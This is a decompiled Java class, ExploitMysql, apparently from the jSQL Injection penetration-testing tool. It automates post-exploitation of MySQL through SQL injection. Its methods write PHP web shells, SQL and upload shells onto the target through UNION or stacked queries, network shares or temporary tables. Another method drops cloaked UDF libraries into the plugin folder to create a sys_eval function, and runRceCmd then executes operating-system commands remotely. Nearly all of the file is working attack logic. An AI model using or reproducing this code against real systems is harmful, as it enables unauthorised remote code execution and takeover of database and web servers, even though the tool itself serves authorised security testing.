/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible.vendor;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.ExploitMode;
import com.jsql.model.accessible.vendor.mysql.ModelYamlMysql;
import com.jsql.model.bean.database.MockElement;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.exception.JSqlRuntimeException;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.LogLevelUtil;
import com.jsql.util.StringUtil;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.OpenOption;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardCopyOption;
import java.util.List;
import java.util.Objects;
import java.util.UUID;
import java.util.function.BiPredicate;
import java.util.function.BinaryOperator;
import org.apache.commons.codec.binary.Hex;
import org.apache.commons.lang3.RandomStringUtils;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.yaml.snakeyaml.Yaml;

public class ExploitMysql {
    private static final Logger LOGGER = LogManager.getRootLogger();
    public static final String NAME_TABLE = "temp";
    private final InjectionModel injectionModel;
    private final ModelYamlMysql modelYaml;
    private final BiPredicate<String, String> biPredCreateUdf = (pathRemoteFolder, nameLibraryRandom) -> {
        try {
            return this.buildSysEval((String)nameLibraryRandom);
        }
        catch (JSqlException e) {
            throw new JSqlRuntimeException(e);
        }
    };

    public ExploitMysql(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        Yaml yaml = new Yaml();
        this.modelYaml = yaml.loadAs(injectionModel.getMediatorVendor().getMysql().instance().getModelYaml().getResource().getExploit(), ModelYamlMysql.class);
    }

    public String createWeb(String pathExploit, String urlExploit, String pathNetshare, ExploitMode exploitMode) throws JSqlException {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: web+db on same machine, FILE priv");
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            Request request = new Request();
            request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
            request.setParameters(urlSuccess);
            this.injectionModel.sendToViews(request);
            return urlSuccess;
        };
        return this.create(pathExploit, urlExploit, "exploit.web", "web.php", biFuncGetRequest, pathNetshare, exploitMode);
    }

    public String createSql(String pathExploit, String urlExploit, String pathNetshare, ExploitMode exploitMode, String username, String password) throws JSqlException {
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            String resultQuery = this.injectionModel.getResourceAccess().runSqlShell("select 1337", null, (String)urlSuccess, username, password, false);
            if (resultQuery != null && resultQuery.contains("| 1337 |")) {
                Request request = new Request();
                request.setMessage(Interaction.ADD_TAB_EXPLOIT_SQL);
                request.setParameters(urlSuccess, username, password);
                this.injectionModel.sendToViews(request);
                return urlSuccess;
            }
            return "";
        };
        String urlSuccess2 = this.create(pathExploit, urlExploit, "exploit.sql.mysqli", "sql.php", biFuncGetRequest, pathNetshare, exploitMode);
        if (StringUtils.isEmpty(urlSuccess2)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Failure with mysqli_query(), trying with pdo()...");
            urlSuccess2 = this.create(pathExploit, urlExploit, "exploit.sql.pdo.mysql", "sql.php", biFuncGetRequest, pathNetshare, exploitMode);
        }
        if (StringUtils.isEmpty(urlSuccess2)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Failure with pdo(), trying with mysql_query()...");
            urlSuccess2 = this.create(pathExploit, urlExploit, "exploit.sql.mysql", "sql.php", biFuncGetRequest, pathNetshare, exploitMode);
        }
        if (StringUtils.isEmpty(urlSuccess2)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "No connection to the database");
        }
        return urlSuccess2;
    }

    public void createUpload(String pathExploit, String urlExploit, String pathNetshare, ExploitMode exploitMode, File fileToUpload) throws JSqlException {
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            try (FileInputStream streamToUpload = new FileInputStream(fileToUpload);){
                HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, (String)urlSuccess, streamToUpload);
                if (result.body().contains("SqLiy")) {
                    LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Upload successful: ack received for {}{}", (Object)pathExploit, (Object)fileToUpload.getName());
                } else {
                    LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Upload failure: missing ack for {}{}", (Object)pathExploit, (Object)fileToUpload.getName());
                }
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
                Thread.currentThread().interrupt();
            }
            catch (JSqlException | IOException e) {
                throw new JSqlRuntimeException(e);
            }
            return urlSuccess;
        };
        this.create(pathExploit, urlExploit, "exploit.upl", "upl.php", biFuncGetRequest, pathNetshare, exploitMode);
    }

    public String create(String pathRemoteFolder, String urlExploit, String keyPropertyExploit, String nameExploit, BinaryOperator<String> biFuncGetRequest, String pathNetshareFolder, ExploitMode exploitMode) throws JSqlException {
        if (this.injectionModel.getResourceAccess().isMysqlReadDenied()) {
            return null;
        }
        String bodyExploit = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(keyPropertyExploit)).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        BiPredicate<String, String> biPredConfirm = (pathFolder, nameFile) -> {
            try {
                String resultInjection = this.confirm(pathFolder + nameFile);
                return resultInjection.contains(bodyExploit);
            }
            catch (JSqlException e) {
                throw new JSqlRuntimeException(e);
            }
        };
        int nbIndexesPrefix = this.injectionModel.getMediatorStrategy().getSpecificUnion().getNbIndexesFound() - 1;
        Object nameExploitValidated = "";
        if (exploitMode == ExploitMode.NETSHARE) {
            ExploitMysql.copyToShare(pathNetshareFolder + nameExploit, bodyExploit);
            nameExploitValidated = this.byNetshare(nbIndexesPrefix, pathNetshareFolder, nameExploit, pathRemoteFolder, biPredConfirm);
        } else if (exploitMode == ExploitMode.AUTO || exploitMode == ExploitMode.QUERY_BODY) {
            nameExploitValidated = this.byQueryBody(nbIndexesPrefix, pathRemoteFolder, nameExploit, StringUtil.toHexChunks(bodyExploit.getBytes()), biPredConfirm);
        }
        if (StringUtils.isEmpty((CharSequence)nameExploitValidated) && exploitMode == ExploitMode.AUTO || exploitMode == ExploitMode.TEMP_TABLE) {
            String nameExploitRandom = RandomStringUtils.secure().nextAlphabetic(8) + "-" + nameExploit;
            this.byTable(StringUtil.toHexChunks(bodyExploit.getBytes()), pathRemoteFolder + nameExploitRandom);
            if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
                nameExploitValidated = nameExploitRandom;
            }
        }
        if (StringUtils.isEmpty((CharSequence)nameExploitValidated)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit creation failure: source file not found at [{}{}]", (Object)pathRemoteFolder, nameExploitValidated);
            return null;
        }
        nameExploit = nameExploitValidated;
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Exploit creation successful: source file found at [{}{}]", (Object)pathRemoteFolder, nameExploitValidated);
        return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public void createUdf(String pathNetshareFolder, ExploitMode exploitMode) throws JSqlException {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "UDF target requirements: stack query, FILE priv");
        if (this.injectionModel.getResourceAccess().isMysqlReadDenied()) {
            return;
        }
        int nbIndexesFound = this.injectionModel.getMediatorStrategy().getSpecificUnion().getNbIndexesFound() - 1;
        String pathPlugin = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getPathPlugin(), "plugin#dir");
        if (StringUtils.isEmpty(pathPlugin)) {
            throw new JSqlException("Incorrect plugin folder: path is empty");
        }
        String nameLibrary = this.getNameLibrary();
        if (!(pathPlugin = pathPlugin.replace("\\", "/")).endsWith("/")) {
            pathPlugin = String.format("%s%s", pathPlugin, "/");
        }
        if (!this.injectionModel.getMediatorStrategy().getStack().isApplicable()) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit UDF requires stack query, trying anyway...");
        }
        String isSuccess = "";
        if (exploitMode == ExploitMode.NETSHARE) {
            if (!((String)pathNetshareFolder).endsWith("\\")) {
                pathNetshareFolder = (String)pathNetshareFolder + "\\";
            }
            ExploitMysql.copyLibraryToShare((String)pathNetshareFolder, nameLibrary);
            isSuccess = this.byNetshare(nbIndexesFound, (String)pathNetshareFolder, nameLibrary, pathPlugin, this.biPredCreateUdf);
        } else if (exploitMode == ExploitMode.AUTO || exploitMode == ExploitMode.QUERY_BODY) {
            if ("GET".equals(this.injectionModel.getMediatorUtils().getConnectionUtil().getTypeRequest())) {
                LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "URL size limited when UDF with GET, if failure then use POST instead");
            }
            isSuccess = this.byQueryBody(nbIndexesFound, pathPlugin, nameLibrary, ExploitMysql.toHexChunks(nameLibrary), this.biPredCreateUdf);
        }
        if (StringUtils.isEmpty(isSuccess) && exploitMode == ExploitMode.AUTO || exploitMode == ExploitMode.TEMP_TABLE) {
            String nameLibraryRandom = RandomStringUtils.secure().nextAlphabetic(8) + "-" + nameLibrary;
            this.byTable(ExploitMysql.toHexChunks(nameLibrary), pathPlugin + nameLibraryRandom);
            this.biPredCreateUdf.test(pathPlugin, nameLibraryRandom);
        }
    }

    private String getNameLibrary() throws JSqlException {
        boolean isWin;
        String versionOsMachine = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getOsMachine(), "system#spec");
        if (StringUtils.isEmpty(versionOsMachine)) {
            throw new JSqlException("Incorrect remote machine: unknown system");
        }
        boolean bl = isWin = versionOsMachine.toLowerCase().contains("win") && !versionOsMachine.toLowerCase().contains("linux");
        String nameLibrary = versionOsMachine.contains("64") ? (isWin ? "64.dll" : "64.so") : (isWin ? "32.dll" : "32.so");
        return nameLibrary;
    }

    public String byQueryBody(int nbIndexesPrefix, String pathRemoteFolder, String nameExploit, List<String> hexChunks, BiPredicate<String, String> biPredConfirm) {
        Object nameExploitValidated = "";
        String pattern = this.modelYaml.getUdf().getAddFile().getQueryBody();
        String nameExploitRandom = RandomStringUtils.secure().nextAlphabetic(8) + "-" + nameExploit;
        int countUnionIndex = this.injectionModel.getMediatorUtils().getPreferencesUtil().isLimitingUnionIndex() ? this.injectionModel.getMediatorUtils().getPreferencesUtil().countUnionIndex() : 15;
        for (int i = Math.max(0, nbIndexesPrefix); i <= countUnionIndex; ++i) {
            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Checking file write with [union select {}fileBody]", (Object)"'',".repeat(i));
            this.injectionModel.injectWithoutIndex(String.format(pattern, "and 1=2 union", "'',".repeat(i), String.join((CharSequence)"", hexChunks), pathRemoteFolder + nameExploitRandom), "body#union-dump");
            if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
                nameExploitValidated = nameExploitRandom;
                break;
            }
            if (nbIndexesPrefix > -1) break;
        }
        if (StringUtils.isEmpty((CharSequence)nameExploitValidated)) {
            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Query body connection failure with union, trying with stack...");
            nameExploitRandom = RandomStringUtils.secure().nextAlphabetic(8) + "-" + nameExploit;
            this.injectionModel.injectWithoutIndex(String.format(pattern, ";", "", String.join((CharSequence)"", hexChunks), pathRemoteFolder + nameExploitRandom), "body#stack-dump");
            if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
                nameExploitValidated = nameExploitRandom;
            }
        }
        return nameExploitValidated;
    }

    public String byNetshare(int nbIndexesPrefix, String pathNetshareFolder, String nameExploit, String pathRemoteFolder, BiPredicate<String, String> biPredConfirm) {
        Object nameExploitValidated = "";
        String pathShareEncoded = pathNetshareFolder.replace("\\", "\\\\");
        String pattern = this.modelYaml.getUdf().getAddFile().getNetshare();
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Checking connection using netshare and union...");
        String nameExploitRandom = RandomStringUtils.secure().nextAlphabetic(8) + "-" + nameExploit;
        this.injectionModel.injectWithoutIndex(String.format(pattern, "and 1=2 union", "'',".repeat(nbIndexesPrefix), pathShareEncoded + nameExploit, pathRemoteFolder + nameExploitRandom), "netshare#union");
        if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
            nameExploitValidated = nameExploitRandom;
        }
        if (StringUtils.isEmpty((CharSequence)nameExploitValidated)) {
            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Checking connection using netshare and stack...");
            nameExploitRandom = RandomStringUtils.secure().nextAlphabetic(8) + "-" + nameExploit;
            this.injectionModel.injectWithoutIndex(String.format(pattern, ";", "", pathShareEncoded + nameExploit, pathRemoteFolder + nameExploitRandom), "netshare#stack");
            if (biPredConfirm.test(pathRemoteFolder, nameExploitRandom)) {
                nameExploitValidated = nameExploitRandom;
            }
        }
        return nameExploitValidated;
    }

    private static void copyLibraryToShare(String pathNetshare, String nameLibrary) throws JSqlException {
        try {
            URI original = Objects.requireNonNull(ExploitMysql.class.getClassLoader().getResource("exploit/mysql/" + nameLibrary)).toURI();
            Path originalPath = new File(original).toPath();
            Path copied = Paths.get(pathNetshare + nameLibrary, new String[0]);
            Files.copy(originalPath, copied, StandardCopyOption.REPLACE_EXISTING);
        }
        catch (IOException | URISyntaxException e) {
            throw new JSqlException("Copy udf into local network share failure: " + e.getMessage());
        }
    }

    public void byTable(List<String> bodyHexChunks, String pathRemoteFile) throws JSqlException {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Checking connection with table and stack...");
        String nameDatabase = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getAddFile().getTempTable().getNameDatabase(), "tbl#dbname");
        if (StringUtils.isEmpty(nameDatabase) || "information_schema".equals(nameDatabase)) {
            nameDatabase = "mysql";
        }
        String nameTableRandom = "temp_" + RandomStringUtils.secure().nextAlphabetic(8);
        String nameSchemaTable = nameDatabase + "." + nameTableRandom;
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFile().getTempTable().getDrop(), nameSchemaTable), "tbl#drop");
        String countResult = this.getCountTable(nameDatabase, nameTableRandom);
        if (!"0".equals(countResult)) {
            throw new JSqlException("Drop table failure: " + countResult);
        }
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFile().getTempTable().getCreate(), nameSchemaTable), "tbl#create");
        countResult = this.getCountTable(nameDatabase, nameTableRandom);
        if (!"1".equals(countResult)) {
            throw new JSqlException("Create table failure: " + countResult);
        }
        int indexChunk = 0;
        for (String chunk : bodyHexChunks) {
            if (indexChunk == 0) {
                this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFile().getTempTable().getInsertChunks(), nameSchemaTable, chunk), "tbl#init");
            } else {
                this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFile().getTempTable().getAppendChunks(), nameSchemaTable, chunk), "tbl#fill");
            }
            ++indexChunk;
        }
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFile().getTempTable().getDump(), nameSchemaTable, pathRemoteFile), "tbl#dump");
    }

    private String getCountTable(String nameDatabase, String nameTableRandom) {
        try {
            return this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getAddFile().getTempTable().getConfirm(), nameTableRandom, nameDatabase), "tbl#check");
        }
        catch (JSqlException e) {
            return e.getMessage();
        }
    }

    private boolean buildSysEval(String nameLibrary) throws JSqlException {
        this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getAddFunction().getDrop(), "udf#drop");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFunction().getCreate(), nameLibrary), "udf#function");
        String confirm = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getAddFunction().getConfirm(), "udf#confirm");
        if (!confirm.contains("sys_eval")) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "UDF failure: sys_eval not found");
            return false;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "UDF successful: sys_eval found");
        Request request = new Request();
        request.setMessage(Interaction.ADD_TAB_EXPLOIT_UDF_MYSQL);
        request.setParameters(null, null);
        this.injectionModel.sendToViews(request);
        return true;
    }

    private static void copyToShare(String pathFile, String bodyExploit) throws JSqlException {
        Path path = Paths.get(pathFile, new String[0]);
        try {
            Files.write(path, bodyExploit.getBytes(), new OpenOption[0]);
        }
        catch (IOException e) {
            throw new JSqlException(e);
        }
    }

    public String confirm(String path) throws JSqlException {
        String[] sourcePage = new String[]{""};
        return new SuspendableGetRows(this.injectionModel).run(this.modelYaml.getFile().getRead().replace("${filepath.hex}", Hex.encodeHexString(path.getBytes(StandardCharsets.UTF_8))), sourcePage, false, 1, MockElement.MOCK, "xplt#confirm-file");
    }

    public String runRceCmd(String command, UUID uuidShell) {
        Object result;
        try {
            result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getRunCmd(), command.replace(" ", "%20")), "udf#run-cmd") + "\n";
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        Request request = new Request();
        request.setMessage(Interaction.GET_TERMINAL_RESULT);
        request.setParameters(uuidShell, result);
        this.injectionModel.sendToViews(request);
        return result;
    }

    private static List<String> toHexChunks(String filename) throws JSqlException {
        try {
            byte[] fileData = Objects.requireNonNull(ExploitMysql.class.getClassLoader().getResourceAsStream("exploit/mysql/" + filename + ".cloak")).readAllBytes();
            fileData = StringUtil.uncloak(fileData);
            return StringUtil.toHexChunks(fileData);
        }
        catch (IOException e) {
            throw new JSqlException(e);
        }
    }

    public ModelYamlMysql getModelYaml() {
        return this.modelYaml;
    }
}

